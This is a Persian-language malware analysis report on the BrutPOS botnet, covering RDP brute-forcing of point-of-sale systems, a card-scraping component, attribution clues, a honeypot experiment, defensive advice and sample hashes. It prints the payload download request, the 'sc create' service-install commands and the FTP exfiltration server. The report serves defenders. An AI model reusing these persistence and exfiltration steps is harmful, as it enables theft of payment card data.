فا

‫ گزارش تحليلي بات نت BrutPOS(قسمت دوم)

IRCRE201407173

مهاجمان مي توانند نام هاي كاربري و كلمات عبوري را كه سيستم هاي آلوده براي حملات brute force روي سرورهاي RDP موجود استفاده مي كنند، تعيين كنند. برخي از نام هاي كاربري و كلمات عبور نشان مي دهد كه مهاجمين بدنبال برندهاي خاص سيستم هاي POS هستند( مانند Micros).


وقتي يك سيستم آلوده شده گزارش RDP login موفق را برمي گرداند، مهاجمان نام كاربري/ كلمه عبور و آدرس IP سرور RDP به علاوه سيستم آلوده اي كه از طريق آن brute force موفقي انجام داده است را نگه مي دارد.

از 60 سرور RDP "خوب" كه توسط مهاجمين ليست شده بود اكثريت آنها(51 عدد) در آمريكا قرار گرفته اند. معمول ترين نام كاربري "administrator" (36 عدد) و معمول ترين كلمه عبور "pos" (12 عدد) و "password" (12 عدد) بوده است.

سرقت از كارت پرداخت

طي بررسي ها، فايل اجرايي ديگري كشف گرديد كه روي سيستم ها اجرا مي شود و مي تواند اطلاعات ورود (كاربري/ كلمه عبور) را بدست آورد(4aed6a5897e9030f09f13f3c51668e92). اين مورد به منظور استخراج اطلاعات كارت پرداخت در فرآيندهاي درحال اجرا در نظر گرفته شده كه دو مسير كد مجزا، بسته به توانايي آن براي permission ديباگ با فراخواني RtlAdjustPrivilage(0×14,1,0…) دارد. اين مسئله ممكن است تلاش براي شناسايي پيكربندي POS باشد. در صورت موفقيت در ديباگ permission، فايل اجرايي، دانلود و اجرا مي شود:


GET /brut.loc/www/bin/1.exe HTTP/1.1
Accept-Encoding: gzip
Connection: Keep-Alive
Accept-Language: ru-RU,en,*
User-Agent: Browser
Host: x.x.x.x

اگر يك بدافزار نتواند permissionها را ديباگ كند، خودش را در %WINDIR%\lsass.exeكپي كرده و سپس خود را به عنوان سرويس نصب مي كند. اسكريپ ذيل براي ايجاد و شروع سرويس بكار مي رود.

sc create winservbinpath= C:\WINDOWS\lsass.exe type= own start= auto
sc start winserv
del 1.bat

وقتي به عنوان يك سرويس اجرا مي شود، برنامه، حافظه را براي همه فرآيندها بجز csrss.exeو conhost.exe جهت اطلاعات كارت پرداخت بلقوه اسكن مي كند. كانديدها با استفاده از Luhn checksum تاييد شده و در winsrv.sys ذخيره مي گردند. سپس winsrv.sys با استفاده ازسرويس FTP روي سرور 62.109.16.195 آپلود مي گردد.

قبل از اتصال به FTP سرور، سرويس نصب به smtp.gmail.com روي پورت 25 متصل شده و از روي پاسخ EHLO آدرس IP خارجي(external) قرباني را بدست مي آورد. winsrv.sys به سرور FTP با استفاده از نامي متشكل از كاراكترهاي بزرگ كه به آدرس IP منتهي مي شود، متصل مي گردد. كاراكتر بزرگ پيشوند با A شروع شده تا Z براي هر فايل جديد ادامه مي يابد. اگر آدرس IP از smtp.gmail.com بدست نيايد، يك شماره چهار رقمي رندوم ايجاد مي گردد.

عامل حمله

درحالي كه اطلاعات كافي براي تعيين عامل حمله وجود ندارد، برخي اطلاعات نشان مي دهد كه مهاجمين از اروپاي شرقي هستند، احتمالا روسيه و اوكراين. علاوه بر اينترفيس زبان روسي، بعد از ريكاوري لاگ هاي وب سرور، 6 آدرسIP كه از اينترفيس مديريتي استفاده مي گردند شناسايي گرديد.

دو مورد از اين آدرس هاي IP از PEOPLE-NET كه يك ISP در اوكراين هستند، مي باشد. در هر دو مورد، User-Agent نشان مي دهد كه درخواست ها از يك موبايل آلكاتل كه سيستم عامل آن اندرويد است، آمده است.

"Mozilla/5.0 (Linux; Android 4.1.1; ALCATEL ONE TOUCH 5020D Build/JRO03C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Mobile Safari/537.36 OPR/19.0.1340.69721"

آدرس IP ديگر از اوكراين از UKRTELNET-ADSL ISP مي باشد. كه در اين مورد User-Agent ، firefox بوده است.

"Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 30.0) Gecko/20100101 Firefox/30.0"

ارتباط ديگر از يك محدوده IP در روسيه بوده است كه به شبكه Macroregional_South در ولووگراد متعلق است.

به علاوه ارتباطي از فرانسه و انگلستان هم بوده است ولي اين ارتباطات با استفاده از سرورهاي VPN ، شركت هاي atomintersoft.com و vpnlux.netايجاد شده است.

استفاده از هاني پات

به منظور درك نيت مهاجمين، يك سرور Windows 2008 R2 با نرم افزار POS نصب گرديد و به هكرها اجازه داده شد تا آن را آلوده كنند. علاوه بر نرم افزار POS، يك سري مستندات مربوط به اطلاعات كارت هاي اعتباري جعلي روي صفحه دسكتاپ آن قرار داده شد. با تقليد از ترافيك توليد شده توسط سيستم هاي آلوده تحت كنترل مهاجمين، محققين توانستند نام كاربري و كلمه عبور كه تركيبي از كلمات "micro" و "admin" بود را به سرور كنترل و فرمان C2ارسال نمايند. سپس صبر كردند تا مهاجمين متصل گردند. مشاهده گرديد كه 27 دقيقه بعد از ارسال نام كاربري و كلمه عبور به C2 مهاجمين به سرور RDP نمونه متصل شدند. مهاجمين از 3 IP آدرس مختلف متصل شدند. يكي از آدرس IP در اوكراين از محدوده IP هاي PEOPLE-NET بود كه لاگ هاي آن در C2 مشاهده گرديد. IP ديگر از VPN از انگلستان و سومي از INETHN از هندوراس بود.

بعد از اتصال، مهاجمين فوراً مستندات حاوي اطلاعات كارت هاي اعتباري را باز كردند و پس از مدت كوتاهي از آن خارج شدند. دومين تلاش براي دسترسي، 4 دقيقه بعد با فعاليت كمي اتفاق افتاد. سومين دسترسي 18 دقيقه بعد اتفاق افتاد. مهاجمين در سومين دسترسي تلاش كردند تا نرم افزار POS را باز كنند كه ناموفق بود. در چهارمين دسترسي كه تنها دو دقيقه بعد اتفاق افتاد فعاليت كمي صورت گرفت. در پنجمين و آخرين دسترسي كه تقريباً 4 ساعت بعد اتفاق افتاد، مهاجمين درايو را فرمت كردند تا جزييات داده ها را از بين برده باشند.

نتيجه گيري

سيستم هاي POS در الويت بالايي براي حمله مجرمان اينترنتي هستند. تنها با يك حمله اسكن ساده، مهاجمين در اين مورد توانستند تا بيش از 5000 ماشين را در بات نت شان بكار ببرند تا در دو هفته به بيش از 60 سيستم دسترسي پيدا كنند.

درحالي كه بدافزارهاي جديد و حملات پيشرفته در حال وقوع است، حملات استاندارد و معمولي مانند كلمات عبور ضعيف و پيش فرض تهديد جدي براي ابزارهاي مديريت از راه دور بشمار مي روند.

بهترين راه محافظت سيستم هاي POS از اين بدافزار آن است كه مديران سيستم، رمزعبور هاي پيش فرض خود را تغييردهند. در ضمن پروتكل RDP (پروتكل دسكتاپ راه دور) كه بر روي پورت 3389 اجرا مي شود، بايستي تنها از سيستم ها مشخص و امن قابل دسترسي باشد. چون اين بدافزار به طور خاص از پروتكل RDP براي بدست آوردن دسترسي استفاده مي كند. بنابراين توجه كنيد كه دسترسي از طريق پورت 3389به ترمينال هاي POS از سيستم هاي غيرمديريتي اصلاً لازم نيست و دسترسي شبكه داخلي به آنها نيز بايستي كاملاً محدود گردد.

نمونه هاي بدافزارBrutPOS

4c3d65c1d8e1d7a2815c0031be41efc7: BrutePOS_Brute
7391ff6f34f79df0ec7571f7afbf8f7a: BrutePOS_Brute
280d920531ba67d8fd81350877914985: BrutePOS_Brute
96487eb38687e84405f045f7ad8a115c: BrutePOS_Brute
c1fab4a0b7f4404baf8eab4d58b1f821: BrutePOS_Brute
6bcff459fbca8a64f1fd74be433e2450: BrutePOS_Brute
daae858fe34dcf263ef6230d887b111d: BrutePOS_Brute
31bd8dd48ac0de3d4da340bf29f4d280: BrutePOS_Brute
0f2266f63c06c0fee3ff999936c7c10a: BrutePOS_Brute
4d4fd96fabb1c525eaeeae8f2652ffa6: BrutePOS_Brute
da6d727ddf096b6654406487bf22d26c: BrutePOS_Brute
fd58144a4cd354bfd09719ac2ccd3511: BrutePOS_Brute
e38e42f20e027389a86d6a5816a6d8f8: BrutePOS_Brute
08863d484b1ebe6359144c9a8d8027c0: BrutePOS_Brute
4ab3a6394a3a1860a6c52cf92d7f7560: BrutePOS_Brute
0e58848506a525c755cb0dad397c1c44: BrutePOS_Brute
60c16d8596063f6ee0eae579f201ae04: BrutePOS_Brute
b2d4fb4977630e68107ee87299a714e6: BrutePOS_Brute
68ba1afd4585b9355cf7009f4604a208: BrutePOS_Brute
9d3d769d3feea92fd4794fc3c59e32df: BrutePOS_Brute
b63581fcf0ff86bb771c3c33205c78ca: BrutePOS_Brute
18eba6f28ab6c088d9fc22b4cc154a77: BrutePOS_Brute
4802539350908fd447a5c3ae3e966be0: BrutePOS_Brute
cbbb68f6d8eda1071078a02fd79ed3ec: BrutePOS_Brute
8ba3c7ccd0a61d5c9a8b94a71ce06328: BrutePOS_Brute
9b8de98badede7f837a34e318b12d842: BrutePOS_Brute
78f4a157db42321e8f61294bb39d7a74: BrutePOS_FTP_Exfil
f36889f30b62a7524bafc766ed78b329: BrutePOS_FTP_Exfil
95b13cd79621931288bd8a8614c8483f: BrutePOS_FTP_Exfil
4aed6a5897e9030f09f13f3c51668e92: BrutePOS_FTP_Exfil
06d8d8e18b91f301ac3fe6fa45ab7b53: BrutePOS_FTP_Exfil
faddbf92ab35e7c3194af4e7a689897c: BrutePOS_FTP_Exfil


نظرات

بدون نظر
شما برای نظر دادن باید وارد شوید

مشخصات خبر

 
تاریخ ایجاد: 23 تیر 1393

برچسب‌ها

امتیاز

امتیاز شما
تعداد امتیازها: 0